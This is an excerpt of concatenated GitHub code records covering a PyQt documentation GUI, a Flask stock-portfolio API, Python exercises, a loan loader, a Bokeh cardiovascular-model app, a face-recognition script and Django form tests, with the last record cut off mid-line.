reply = QtWidgets.QMessageBox.question(self, 'Message',\n \"Are you sure to quit?\", QtWidgets.QMessageBox.Yes, QtWidgets.QMessageBox.No)\n\n if reply == QtWidgets.QMessageBox.Yes: \n self.paramsRestart['SourceFolder'] = self.SourceFolder.text()\n self.paramsRestart['DestinationFolder'] = self.DestinationFolder.text()\n self.yaml.save(self.paramsRestart, self.params['ParamsRestartPath'])\n event.accept()\n else:\n event.ignore()\n \n def serverfunc(self, DestinationFolder):\n os.chdir(DestinationFolder) \n PORT = 8000\n Handler = http.server.SimpleHTTPRequestHandler \n with socketserver.TCPServer((\"\", PORT), Handler) as self.httpd:\n self.httpd.serve_forever()\n self.StatusLine.append('Closing server')\n \n @pyqtSlot()\n def on_textChanged_SourceFolder(self):\n SourceFolder = self.SourceFolder.text()\n DestinationFolder = self.DestinationFolder.text()\n if (not os.path.isdir(SourceFolder)) or (not os.path.isdir(DestinationFolder)):\n self.CreateDocButton.setEnabled(False)\n else:\n self.CreateDocButton.setEnabled(True)\n \n @pyqtSlot()\n def on_textChanged_DestinationFolder(self):\n SourceFolder = self.SourceFolder.text()\n DestinationFolder = self.DestinationFolder.text()\n if (not os.path.isdir(SourceFolder)) or (not os.path.isdir(DestinationFolder)):\n self.CreateDocButton.setEnabled(False)\n else:\n self.CreateDocButton.setEnabled(True)\n self.doc_exist = 
os.path.isfile(DestinationFolder + '/index.html')\n self.OpenDocButton.setEnabled(self.doc_exist)\n\n \n @pyqtSlot()\n def on_CloseDocButton(self):\n print('on_CloseDocButton')\n self.httpd.shutdown()\n self.thread_server.join()\n #self.thread_server._stop()\n DestinationFolder = self.DestinationFolder.text()\n self.doc_exist = os.path.isfile(DestinationFolder + '/index.html')\n self.OpenDocButton.setEnabled(self.doc_exist)\n self.doc_open = False\n self.CloseDocButton.setEnabled(self.doc_open)\n \n @pyqtSlot()\n def on_OpenDocButton(self): \n DestinationFolder = self.DestinationFolder.text()\n if os.path.isdir(DestinationFolder):\n call([\"C:/Program Files/Mozilla Firefox/firefox.exe\", \"-new-window\", \"http://127.0.0.1:8000/\"]) \n self.thread_server = threading.Thread(target=self.serverfunc,args=[self.DestinationFolder.text()])\n self.thread_server.start()\n self.StatusLine.append('Opening server')\n self.doc_open = True\n self.CloseDocButton.setEnabled(self.doc_open)\n self.OpenDocButton.setEnabled(not self.doc_open)\n else:\n self.StatusLine.append('Destination folder not found!')\n self.doc_open = False\n self.CloseDocButton.setEnabled(self.doc_open)\n\n @pyqtSlot()\n def on_SourceButton(self): \n self.SourceFolder.setText(str(QFileDialog.getExistingDirectory(self, \"Select source folder\")))\n \n @pyqtSlot()\n def on_DestinationButtonButton(self): \n self.DestinationFolder.setText(str(QFileDialog.getExistingDirectory(self, \"Select destination folder\")))\n \n @pyqtSlot()\n def on_CreateDocButton(self): \n if self.CopyCheckBox.isChecked():\n # Deep copy\n sourceFolder = self.SourceFolder.text()\n destinationFolder = self.DestinationFolder.text()\n if not sourceFolder:\n self.StatusLine.append(\"Source folder is not defined!\")\n return\n if not destinationFolder:\n self.StatusLine.append(\"Target folder is not defined!\")\n return\n YMlFilepath = self.params['YMLPath']\n created = self.doc.createMKDocs(sourceFolder, destinationFolder, YMlFilepath)\n else:\n # Extract markdown files and copy in tmp folder\n sourceFolder = self.SourceFolder.text()\n destinationFolder = self.DestinationFolder.text() \n if not sourceFolder:\n self.StatusLine.append(\"Source folder is not defined!\")\n return\n if not destinationFolder:\n self.StatusLine.append(\"Target folder is not defined!\")\n return\n \n num=len(sourceFolder)\n for root, directories, filenames in os.walk(sourceFolder):\n files = [ file for file in filenames if file.endswith( ('.md') ) ]\n for filename in files: \n filepath = os.path.join(root,filename) \n src = filepath\n tmp_path = os.path.dirname(sourceFolder) + \"/tmp\"\n dst = tmp_path + src[num:] \n os.makedirs(os.path.dirname(dst), exist_ok=True)\n copyfile(src, dst)\n \n # Shellow copy\n dir_path = os.path.dirname(os.path.realpath(__file__))\n sourceFolder = dir_path + \"\\\\tmp\"\n destinationFolder = self.DestinationFolder.text()\n YMlFilepath = self.params['YMLPath']\n created = self.doc.createMKDocs(tmp_path, destinationFolder, YMlFilepath) \n \n # Delete tmp folder\n if os.path.exists(tmp_path) and os.path.isdir(tmp_path):\n rmtree(tmp_path)\n if created:\n self.StatusLine.append(\"Documentation creation succeeded.\")\n self.doc_exist = True\n self.OpenDocButton.setEnabled(True)\n else:\n self.StatusLine.append(\"Documentation creation failed.\")\n self.doc_exist = False\n self.OpenDocButton.setEnabled(False)\n \n #@pyqtSlot()\n def on_clicked_OrdersMillingTable(self, signal):\n row = signal.row()\n parameter = self.orders[row][2]\n self.updateParameter(parameter)\n 
self.current_order = self.orders[row]\n    \n    #@pyqtSlot()\n    def on_clicked_OrdersTable(self, signal):\n        row = signal.row()\n        parameter = self.orders[row][2]\n        self.updateParameter(parameter)\n        self.current_order = self.orders[row]\n    \n    @pyqtSlot()\n    def on_LoadOrdersButton(self):\n        \n        print('on_LoadOrdersButton')\n        # Init OrdersTable\n        self.orders = self.drawing.database.getOrders()\n        self.OrdersTable.setSelectionBehavior(QTableView.SelectRows);\n        self.OrdersMillingTable.setSelectionBehavior(QTableView.SelectRows);\n        self.model = QtGui.QStandardItemModel(parent=self)\n        header = ['OrderID', 'FurnitureID', 'Parameter']\n        self.model.setHorizontalHeaderLabels(header)\n        \n        # Set orders data\n        row = 0\n        for o in self.orders:\n            for column in range(len(header)):\n                item = QtGui.QStandardItem()\n                item.setText(str(o[column]))\n                self.model.setItem(row, column, item)\n            row = row + 1\n        self.OrdersTable.setModel(self.model)\n        self.OrdersMillingTable.setModel(self.model)\n    \n    @pyqtSlot()\n    def on_CreateDrawingButton(self): \n        # Start FreeCAD and open furniture\n        furnitureID = self.current_order[0]\n        column = 'name'\n        furnitureName = self.drawing.database.getFurniture(furnitureID, column)[0][0]\n        furnituresPath = self.drawing.database.getParameter('furnituresPath')[0]\n        furnitureFilePath = furnituresPath + '/' + furnitureName + '/' + furnitureName + '.FCStd'\n        freecadPath = self.params['FreeCADPath']\n        self.drawing.startFreecad(furnitureFilePath, freecadPath)\n    \n    def updateParameter(self, parameter):\n        \n        # Split milling part names\n        self.Parameters.setText('')\n        params = parameter.split(\",\")\n        for txt in params:\n            txt=txt.replace(\" \", \"\")\n            self.Parameters.append(txt)\n    \ndef isfloat(x):\n    try:\n        float(x)\n    except ValueError:\n        return False\n    else:\n        return True\n\ndef isint(x):\n    try:\n        int(x)\n    except ValueError:\n        return False\n    else:\n        return True\n\ndef startGUI():\n    # Start GUI\n    app = QApplication(sys.argv)\n    widget = MDDocGUI()\n    widget.show();\n    app.aboutToQuit.connect(app.deleteLater)\n    sys.exit(app.exec_())\n    \ndef main():\n\n    # Start GUI\n    startGUI()\n    \nif __name__ == '__main__':\n    main()","repo_name":"Berni1557/MDDoc","sub_path":"MDDocGUI.py","file_name":"MDDocGUI.py","file_ext":"py","file_size_in_byte":12550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"26219942262","text":"\"\"\"\napi.py\n- provides the API endpoints for consuming and producing\n  REST requests and responses\n\"\"\"\n\nfrom flask import request\nfrom flask_restful import Resource\nfrom datetime import datetime, timedelta\n\nimport json\nimport requests\n\n# Free API limits - 5 requests per minute and 500 per day\nAV_API_URL = \"https://www.alphavantage.co/query?apikey=9G4G4R3GA5E5ENSZ&\"\n\n# Data store init state\nstore = {\n    'cash_value': 0,\n    'portfolio': {\n        'VFINX': {\n            # 'name': 'Vanguard 500 Index Fund Investor Shares',\n            'quantity': 0,\n            'price': None,\n        },\n        'NAESX': {\n            # 'name': 'Vanguard Small Capitalization Index Fund Investor Shares',\n            'quantity': 0,\n            'price': None,\n        },\n        'VGTSX': {\n            # 'name': 'Vanguard Total International Stock Index Fund Investor Shares',\n            'quantity': 0,\n            'price': None,\n        },\n        'VBMFX': {\n            # 'name': 'Vanguard Total Bond Market Index Fund Investor Shares',\n            'quantity': 0,\n            'price': None,\n        }\n    },\n    'last_updated': { # when was the price last updated from Alpha Vantage\n        'VFINX': None,\n        'NAESX': None,\n        'VGTSX': None,\n        'VBMFX': None,\n    },\n}\n\n\nclass Cash(Resource):\n    def get(self):\n        # Default to 200 OK\n        return {'cashValue': store['cash_value']}\n\n    def post(self):\n        data = request.get_json()\n        transfer_amount = float(data['transferAmount'])\n\n        if store['cash_value'] + transfer_amount < 0:\n            return {}, 403  # Forbidden\n        else:\n            store['cash_value'] += transfer_amount\n            return {}, 200\n\n\nclass Portfolio(Resource):\n    def get(self):\n        status_code = 200\n        for symbol in store['portfolio']:\n            stock = store['portfolio'][symbol]\n            # Only update from Alpha Vantage for first time or max once every 5 minutes\n            if store['last_updated'][symbol] == None or datetime.now() - store['last_updated'][symbol] > timedelta(seconds=5*60):\n                response = requests.get(\n                    AV_API_URL + 'function=GLOBAL_QUOTE&symbol=' + symbol)\n                try:\n                    # This works because stock is just a pointer\n                    stock['price'] = float(\n                        response.json()[\"Global Quote\"][\"05. price\"])\n                    store['last_updated'][symbol] = datetime.now()\n                except:\n                    status_code = 429  # Too Many Requests\n\n        return {'portfolio': store['portfolio']}, status_code\n\n\nclass Stock(Resource):\n    def post(self, symbol):\n        stock = store['portfolio'][symbol]\n        data = request.get_json()\n        transfer_amount = int(data['transferAmount'])\n\n        if stock['quantity'] + transfer_amount < 0:\n            return {}, 403  # Forbidden\n        elif transfer_amount * stock['price'] > store['cash_value']:\n            # Make sure they have enough money\n            return {}, 403\n        else:\n            stock['quantity'] += transfer_amount\n            store['cash_value'] -= transfer_amount * stock['price']\n            return {}, 200\n","repo_name":"viv-li/bonsai","sub_path":"backend/bonsaiapi/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"20689504016","text":"def solution1(a, b, k):\n    count_tiny = 0\n    concat_numbers = []\n    for i, j in zip(a, reversed(b)):\n        temp_j = j\n        count_digits = 0\n        while temp_j != 0:\n            temp_j = temp_j // 10\n            count_digits += 1\n        # numeric concatenation: shift i left by one decimal place per digit of j\n        concat_number = i * 10 ** count_digits + j\n        concat_numbers.append(concat_number)\n    for num in concat_numbers:\n        if num < k:\n            count_tiny += 1\n    return count_tiny\nprint(solution1([1,2,3], [1,2,3], 31))\n\ndef solution(a, k):\n    list_of_sums = []\n    count = 0\n    for i in range(len(a) - 1):\n        for j in range(i+1, len(a)):\n            list_of_sums.append(a[i] + a[j])\n    for num in list_of_sums:\n        if num % k == 0:\n            count += 1\n    return count\n\ndef solution2(a, k):\n    nums = [a[i] + a[j] for i in range(len(a) - 1) for j in range(i+1, len(a)) if (a[i] + a[j]) % k == 0]\n    print(nums)\n    return len(nums)\nprint(solution2([1, 2, 3, 4, 5], 3))\n\ndef solution(a, k):\n    if k == 0:\n        return 0\n    else:\n        return len([a[i] + a[j] for i in range(len(a) - 1) for j in range(i+1, len(a)) \\\n            if (a[i] + a[j]) % k == 0])","repo_name":"nadia-paz/ds-learning","sub_path":"python/data_structures/exercises2.py","file_name":"exercises2.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"13235107821","text":"# classwork\ndef doNow(s):\n    if len(s) >= 3:\n        if s[-3:] == \"ing\":\n            return s + \"ly\"\n        else:\n            return s + \"ing\"\n    else:\n        return s\n\ndef oddIndex(s):\n    return s[::2]\n\n\ndef count(s):\n    searched = \"\"\n    for i in range(0, len(s)):\n        if searched.count(s[i]) == 0:\n            searched += s[i]\n            if s.count(s[i]) > 1:\n                print(s[i], s.count(s[i]))\n\n# homework\ndef index(s, c):\n    for i in range(len(s)):\n        if(s[i] == c):\n            print(\"Current character\", s[i], \"position at\", i)\n\n\n# challenge\ndef replace(s):\n    n = 
s.find(\"not\")\n p = s.find(\"poor\")\n if n == -1 or p == -1:\n return s\n\n n += 3\n\n return s[:p] + \"good\" + s[n:]\n\ndef caesar(s, shift):\n ans = \"\"\n for i in range(0, len(s)):\n if 97 <= ord(s[i]) <= 122:\n ans += chr((((ord(s[i]) - 97) - shift) % 26) + 97)\n elif 65 <= ord(s[i]) <= 90:\n ans += chr((((ord(s[i]) - 65) - shift) % 26) + 65)\n else:\n ans += s[i]\n\n return ans\n","repo_name":"aaaronhsu/MKS22QA","sub_path":"Unit 2 - Strings and Lists/2_25moreStrings.py","file_name":"2_25moreStrings.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2477918955","text":"import csv\n\n\nclass Loan:\n '''\n Loan class.\n '''\n\n def __init__(self, id, interest_rate, default_likelihood, amount, state):\n '''\n :param id: str, loan id\n :param interest_rate: float, interest rate\n :param default_likelihood: float, default likelihood\n :param amount: int, amount\n :param state: str, state code\n id: facility if only if assigned\n '''\n self.id = id\n self.interest_rate = interest_rate\n self.default_likelihood = default_likelihood\n self.amount = amount\n self.state = state\n self.facility_id = None\n\n def __repr__(self):\n return (\n f'Loan [id:{self.id}, '\n f'interest_rate:{self.interest_rate}, '\n f'default_likelihood:{self.default_likelihood}, '\n f'amount:{self.amount}, '\n f'state:{self.state}]'\n )\n\n @staticmethod\n def load(file):\n '''\n Load plain Loans objects from the input file.\n\n :param file: path to loans.csv\n '''\n loan_dict = csv.DictReader(open(file, mode='r'))\n loans = []\n\n for line in loan_dict:\n loan = Loan(id=line['id'],\n amount=int(line['amount']),\n interest_rate=float(line['interest_rate']),\n default_likelihood=float(line['default_likelihood']),\n state=line['state'])\n loans.append(loan)\n\n return loans\n","repo_name":"beaglebagel/code_sample","sub_path":"sample_1/loan.py","file_name":"loan.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27805904390","text":"'''\nCreated on Oct 5, 2016\n\n@author: fredrik\n'''\n'''\nCreated on Oct 3, 2016\n\n@author: fredrik\n'''\n\nimport numpy as np\nimport os\nfrom os.path import dirname, join\nfrom bokeh.plotting import Figure\nfrom bokeh.models import ColumnDataSource, Range1d\nfrom bokeh.models.widgets import Select\nfrom classVeWK3 import varyingElastance\n\nimport h5py\n\n\nclass SetupApp:\n \n def __init__(self):\n \n \n self.T = 1.\n N = 250\n self.cardiacCycles = 5\n self.t = np.linspace(0, self.T*self.cardiacCycles, N*self.cardiacCycles + 1)\n\n self.veWK3 = varyingElastance(self.t, self.T)\n \n t, P, P_LV, Q, E, V = self.veWK3.solveNCycle(Ncycles=self.cardiacCycles)\n t_last_cycle = np.linspace(self.T*(self.cardiacCycles - 1), self.T*(self.cardiacCycles - 0), 1001)\n P_last, P_LV_last, Q_last, E_last, V_last = self.getLastCycle(t_last_cycle, t, P, P_LV, Q, E, V)\n \n self.source_p = ColumnDataSource(data=dict(x=t, y=P))\n self.source_p_LV = ColumnDataSource(data=dict(x=t, y=P_LV))\n self.source_LV_loop = ColumnDataSource(data=dict(x=V, y=P_LV))\n \n self.source_p_last = ColumnDataSource(data=dict(x=t_last_cycle, y=P_last))\n self.source_p_LV_last = ColumnDataSource(data=dict(x=t_last_cycle, y=P_LV_last))\n self.source_q_last = ColumnDataSource(data=dict(x=t_last_cycle, y=Q_last))\n self.source_E_last = ColumnDataSource(data=dict(x=[], y=[]))\n # Set up plot_line y = a*x + b\n self.plot_P = 
Figure(plot_height=400, plot_width=550, title=\"aortic and ventricular pressure\",\n                      x_axis_label=\"t\", y_axis_label=\"P [mmHg]\",\n                      tools=\"crosshair,pan,reset,save,wheel_zoom\",\n                      y_range=[0, 200])\n        self.plot_LV_loop = Figure(plot_height=400, plot_width=550, title=\"PV-loop\",\n                      x_axis_label=\"V [ml]\", y_axis_label=\"P [mmHg]\",\n                      tools=\"crosshair,pan,reset,save,wheel_zoom\",\n                      x_range=[0, 200], y_range=[0, 200])\n\n        self.plot_P_last = Figure(plot_height=400, plot_width=550, title=\"aortic and ventricular pressure (last cardiac cycle)\",\n                      x_axis_label=\"t\", y_axis_label=\"P [mmHg]\",\n                      tools=\"crosshair,pan,reset,save,wheel_zoom\",\n                      y_range=[0, 200])\n\n        self.plot_flow_or_elastance_last = Figure(plot_height=400, plot_width=550, title=\"flow\",\n                      x_axis_label=\"t\", y_axis_label=\"flow [ml/s]\",\n                      tools=\"crosshair,pan,reset,save,wheel_zoom\",\n                      )\n        \n        self.plot_P.line('x', 'y', source=self.source_p, color='blue', line_alpha=0.6, line_width=2)\n        self.plot_P.line('x', 'y', source=self.source_p_LV, color='green', line_alpha=0.6, line_width=2)\n\n        self.plot_LV_loop.line('x', 'y', source=self.source_LV_loop, color='blue', line_alpha=0.6, line_width=2)\n        \n        self.plot_P_last.line('x', 'y', source=self.source_p_last, color='blue', line_alpha=0.6, line_width=2, legend=\"aorta\")\n        self.plot_P_last.line('x', 'y', source=self.source_p_LV_last, color='green', line_alpha=0.6, line_width=2, legend=\"left ventricle\")\n        \n        self.plot_flow_or_elastance_last.line('x', 'y', source=self.source_q_last, color='blue', line_alpha=0.6, line_width=2)\n        self.plot_flow_or_elastance_last.line('x', 'y', source=self.source_E_last, color='blue', line_alpha=0.6, line_width=2)\n        \n        self.resistanceSelect = Select(title=\"select total resistance\", value=\"1.25\", options=[\"1\", \"1.25\", \"1.5\"])\n        self.resistanceFactorSelect = Select(title=\"select factor for proximal resistance\", value=\"0.1\", options=[\"0.05\", \"0.1\", \"0.15\", \"0.2\"])\n        self.complianceSelect = Select(title=\"select total compliance\", value=\"2.0\", options=[\"1\", \"1.5\", \"2.0\", \"2.5\"])\n        self.eMaxSelect = Select(title=\"select E max\", value=\"2.0\", options=[\"1\", \"1.5\", \"2.0\", \"2.5\"])\n        self.eMinSelect = Select(title=\"select E min\", value=\"0.06\", options=[\"0.03\", \"0.06\", \"0.09\", \"0.12\"])\n        self.tPeakSelect = Select(title=\"select time to peak\", value=\"0.32\", options=[\"0.25\", \"0.28\", \"0.30\", \"0.32\"])\n        self.RvSelect = Select(title=\"select mitral resistance\", value=\"0.005\", options=[\"0.0025\", \"0.005\", \"0.01\", \"0.05\"])\n        self.n1Select = Select(title=\"select elastance shape-function n1\", value=\"1.32\", options=[\"1.1\", \"1.2\", \"1.32\", \"1.4\"])\n        self.n2Select = Select(title=\"select elastance shape-function n2\", value=\"21.9\", options=[\"15\", \"21.9\", \"25\", \"30\"])\n        self.flowOrElastanceSelect = Select(title=\"show flow or elastance\", value=\"flow\", options=[\"flow\", \"elastance\"])\n        self.nCyclesSelect = Select(title=\"select number of cycles\", value=\"5\", options=[\"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"11\", \"12\", \"13\", \"14\", \"15\"])\n        self.nTimePointsSelect = Select(title=\"select time-points per cycle\", value=\"250\", options=[\"100\", \"150\", \"200\", \"250\", \"500\", \"1000\", \"2000\", \"3000\", \"4000\", \"5000\", \"6000\", \"7000\", \"8000\", \"9000\", \"10000\"])\n\n        self.symbolicSelect = Select(title=\"use symbolic differentiation\", value=\"True\", options=[\"True\", \"False\"])\n        self.isoSelect = Select(title=\"use 
integrated iso eq\", value=\"True\", options=[\"True\", \"False\"])\n\n \n\n\n self.Widgetlist = [self.resistanceSelect, self.resistanceFactorSelect, self.complianceSelect,\n self.eMaxSelect, self.eMinSelect, self.tPeakSelect, self.RvSelect,\n self.n1Select, self.n2Select, self.flowOrElastanceSelect, self.nCyclesSelect, \n self.nTimePointsSelect, self.symbolicSelect, self.isoSelect]\n \n def update_data(self, attrname, old, new):\n \n \n R_tot = float(self.resistanceSelect.value)\n\n R_factor = float(self.resistanceFactorSelect.value)\n C_tot = float(self.complianceSelect.value)\n Emax = float(self.eMaxSelect.value)\n\n Emin = float(self.eMinSelect.value)\n TPeak = float(self.tPeakSelect.value)\n Rv = float(self.RvSelect.value)\n n1 = float(self.n1Select.value)\n n2 = float(self.n2Select.value)\n flowOrElastance = self.flowOrElastanceSelect.value\n self.cardiacCycles = int(self.nCyclesSelect.value)\n symbolic_differentiation = (self.symbolicSelect.value)\n integrated_iso_eq = (self.isoSelect.value)\n N = int(self.nTimePointsSelect.value)\n t = np.linspace(0, self.T*self.cardiacCycles, N*self.cardiacCycles + 1)\n \n \n \n self.veWK3.initializeWKParams(R_tot=R_tot, C_tot=C_tot, R1_frac=R_factor)\n self.veWK3.Emax = Emax\n self.veWK3.Emin = Emin\n self.veWK3.TPeak = TPeak\n self.veWK3.Rv = Rv\n self.veWK3.n1 = n1\n self.veWK3.n2 = n2\n \n if symbolic_differentiation == \"True\":\n self.veWK3.symbolic_differentiation = True\n else:\n self.veWK3.symbolic_differentiation = False\n\n if integrated_iso_eq == \"True\":\n self.veWK3.integrated_iso_eq = True\n else:\n self.veWK3.integrated_iso_eq = False\n \n self.veWK3.t = t\n t, P, P_LV, Q, E, V = self.veWK3.solveNCycle(Ncycles=self.cardiacCycles)\n \n t_last_cycle = np.linspace(self.T*(self.cardiacCycles - 1), self.T*(self.cardiacCycles - 0), 1001)\n \n P_last, P_LV_last, Q_last, E_last, V_last = self.getLastCycle(t_last_cycle, t, P, P_LV, Q, E, V)\n \n self.source_p.data = dict(x=t, y=P)\n self.source_p_LV.data = dict(x=t, y=P_LV)\n self.source_LV_loop.data = dict(x=V_last, y=P_LV_last)\n self.source_p_last.data = dict(x=t_last_cycle, y=P_last)\n self.source_p_LV_last.data = dict(x=t_last_cycle, y=P_LV_last)\n \n if flowOrElastance == \"flow\":\n self.source_q_last.data = dict(x=t_last_cycle, y=Q_last)\n self.source_E_last.data = dict(x=[], y=[])\n self.plot_flow_or_elastance_last.title.text = \"flow\"\n self.plot_flow_or_elastance_last.yaxis.axis_label = \"flow [ml/s]\"\n else:\n self.source_q_last.data = dict(x=[], y=[])\n self.source_E_last.data = dict(x=t_last_cycle, y=E_last)\n self.plot_flow_or_elastance_last.title.text = \"elastance\"\n self.plot_flow_or_elastance_last.yaxis.axis_label = \"E [mmHg/ml]\"\n \n \n #self.plotQ.title.text = \"Qm = ({0}, {1}); (reference, ecmo)\".format(Qm, Qm_ecmo)\n \n def getLastCycle(self, t_last, t, P, P_LV, Q, E, V):\n \n P_last = np.interp(t_last, t, P)\n P_LV_last = np.interp(t_last, t, P_LV)\n Q_last = np.interp(t_last, t, Q)\n E_last = np.interp(t_last, t, E)\n V_last = np.interp(t_last, t, V)\n \n return P_last, P_LV_last, Q_last, E_last, V_last\n \n\n","repo_name":"Fredf10/apps","sub_path":"VeWK3/classCreateSimpleApp.py","file_name":"classCreateSimpleApp.py","file_ext":"py","file_size_in_byte":9069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24028555215","text":"import cv2\r\nimport numpy\r\nimport face_recognition\r\nimport os\r\n\r\npath = \"img\"\r\nimages = []\r\nclassNames = []\r\nmyList = 
os.listdir(path)\r\nprint(myList)\r\n\r\nfor i in myList:\r\n    #loads the images\r\n    currImg = cv2.imread(f'{path}/{i}')\r\n    images.append(currImg)\r\n    #without .jpg\r\n    classNames.append(os.path.splitext(i)[0])\r\nprint(images)\r\nprint(classNames)\r\n\r\ndef findEncoding(images):\r\n    encodeList = []\r\n    \r\n    for img in images:\r\n        # for better Results\r\n        img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\r\n        \r\n        # recognize the face\r\n        encode = face_recognition.face_encodings(img)[0]\r\n        encodeList.append(encode)\r\n    return encodeList\r\n\r\nencodeList = findEncoding(images)\r\nprint(\"Encoding Completed\\n\")\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n    # cap.read() return 2 content\r\n    success, img = cap.read()\r\n\r\n    # size reduce will speed the process 1/4th\r\n    imgS = cv2.resize(img,(0,0),None,0.25,0.25)\r\n    imgS = cv2.cvtColor(imgS,cv2.COLOR_BGR2RGB)\r\n\r\n    facesCurrFrame = face_recognition.face_locations(imgS)\r\n    encodeCurrFrame = face_recognition.face_encodings(imgS,facesCurrFrame)\r\n\r\n    for encodeFace,faceLoc in zip(encodeCurrFrame,facesCurrFrame):\r\n        matches = face_recognition.compare_faces(encodeList,encodeFace)\r\n        faceDis = face_recognition.face_distance(encodeList,encodeFace)\r\n        #print(faceDis)\r\n        matchIndex = numpy.argmin(faceDis)\r\n        if matches[matchIndex]:\r\n            name = classNames[matchIndex]\r\n            #print(name)\r\n            y1,x2,y2,x1 = faceLoc\r\n            y1,x2,y2,x1 = y1*4,x2*4,y2*4,x1*4\r\n            # form rectangle around the face\r\n            cv2.rectangle(img,(x1,y1),(x2,y2),(564,255,0),2)\r\n            # form rectangle in which we write name\r\n            cv2.rectangle(img,(x1,y2-35),(x2,y2),(0,255,0),cv2.FILLED)\r\n            # for name\r\n            cv2.putText(img, name,(x1+6,y2-6),cv2.FONT_HERSHEY_COMPLEX,1,(255,255,255),2)\r\n    \r\n    cv2.imshow('Webcam',img)\r\n    if cv2.waitKey(1) & 0xFF == ord('q'):\r\n        break\r\n\r\n# Release handle to the webcam\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"Dikshant20011891/Face-Recognition","sub_path":"faceRecog.py","file_name":"faceRecog.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"11932911187","text":"import shutil\nimport tempfile\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.test import override_settings\n\nfrom posts.models import Comment, Post\nfrom .test_config import CREATE_REVERSE, BaseTestCase\n\nSMALL_JPG = (\n    b'\\x47\\x49\\x46\\x38\\x39\\x61\\x02\\x00'\n    b'\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00'\n    b'\\xFF\\xFF\\xFF\\x21\\xF9\\x04\\x00\\x00'\n    b'\\x00\\x00\\x00\\x2C\\x00\\x00\\x00\\x00'\n    b'\\x02\\x00\\x01\\x00\\x00\\x02\\x02\\x0C'\n    b'\\x0A\\x00\\x3B'\n)\nUPLOADED = SimpleUploadedFile(\n    name='small.jpg',\n    content=SMALL_JPG,\n    content_type='image/jpg'\n)\nUPLOADED_EDIT = SimpleUploadedFile(\n    name='small_edit.jpg',\n    content=SMALL_JPG,\n    content_type='image/jpg'\n)\nPATH_TO_IMAGE = f'posts/{UPLOADED.name}'\nPATH_TO_IMAGE_EDIT = f'posts/{UPLOADED_EDIT.name}'\nTEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)\n\n\n@override_settings(MEDIA_ROOT=TEMP_MEDIA_ROOT)\nclass PostFormTests(BaseTestCase):\n    @classmethod\n    def tearDownClass(cls):\n        super().tearDownClass()\n        shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n\n    def test_create_post_show_correct_context(self):\n        \"\"\"The create_form template is rendered with the correct context.\"\"\"\n        responses = {\n            self.authors_client.get(CREATE_REVERSE):\n            'create',\n            self.authors_client.get(\n                
self.POST_EDIT_REVERSE): 'edit'\n        }\n        for response, act in responses.items():\n            if act == 'create':\n                form_fields = {\n                    'text': forms.fields.CharField,\n                    'group': forms.models.ModelChoiceField\n                }\n                for value, expected in form_fields.items():\n                    with self.subTest(value=value):\n                        form_field = response.context['form'].fields[value]\n                        self.assertIsInstance(form_field, expected)\n            elif act == 'edit':\n                form_instance = response.context['form'].instance\n                self.assertEqual(form_instance, self.posts)\n\n    def test_post_form_create_post(self):\n        \"\"\"A valid form creates a post\"\"\"\n        posts_count = Post.objects.count()\n        form_data = {\n            'text': 'Test text',\n            'group': self.first_group.pk,\n            'image': UPLOADED\n        }\n        self.authors_client.post(\n            CREATE_REVERSE,\n            data=form_data,\n            follow=True\n        )\n        post = Post.objects.latest('pub_date')\n        self.assertEqual(Post.objects.count(), posts_count + 1)\n        self.assertEqual(post.text, form_data['text'])\n        self.assertEqual(post.group.pk, form_data['group'])\n        self.assertEqual(post.author, self.author)\n        self.assertEqual(post.image, PATH_TO_IMAGE)\n\n    def test_post_form_edit_post(self):\n        \"\"\"A valid form edits a post\"\"\"\n        post_count = Post.objects.all().count()\n        form_data_edit = {\n            'text': 'Edited',\n            'group': self.first_group.pk,\n            'image': UPLOADED_EDIT\n        }\n        response = self.authors_client.post(\n            self.POST_EDIT_REVERSE,\n            data=form_data_edit,\n            follow=True\n        )\n        post = Post.objects.get(text=form_data_edit['text'])\n\n        self.assertRedirects(response, self.POST_DETAIL_REVERSE)\n        self.assertEqual(post_count, Post.objects.all().count())\n        self.assertEqual(post.text, form_data_edit['text'])\n        self.assertEqual(post.group.id, form_data_edit['group'])\n        self.assertEqual(post.author, self.author)\n        self.assertEqual(post.image, PATH_TO_IMAGE_EDIT)\n\n\nclass CommentFormTest(BaseTestCase):\n    def test_authorized_user_comment_post(self):\n        comment_count = Comment.objects.all().count()\n        comment_data = {\n            'text': 'Test comment',\n            'post': self.posts,\n            'author': self.author\n        }\n        response = self.authors_client.post(\n            self.COMMENT_REVERSE,\n            data=comment_data,\n            follow=True\n        )\n        self.assertRedirects(\n            response, self.POST_DETAIL_REVERSE\n        )\n        created_comment = Comment.objects.latest('created')\n        self.assertEqual(Comment.objects.all().count(), comment_count + 1)\n        self.assertEqual(created_comment.text, comment_data['text'])\n        self.assertEqual(created_comment.post, comment_data['post'])\n        self.assertEqual(created_comment.author, comment_data['author'])\n        response = self.authors_client.get(\n            self.POST_DETAIL_REVERSE)\n        self.assertIn(created_comment, 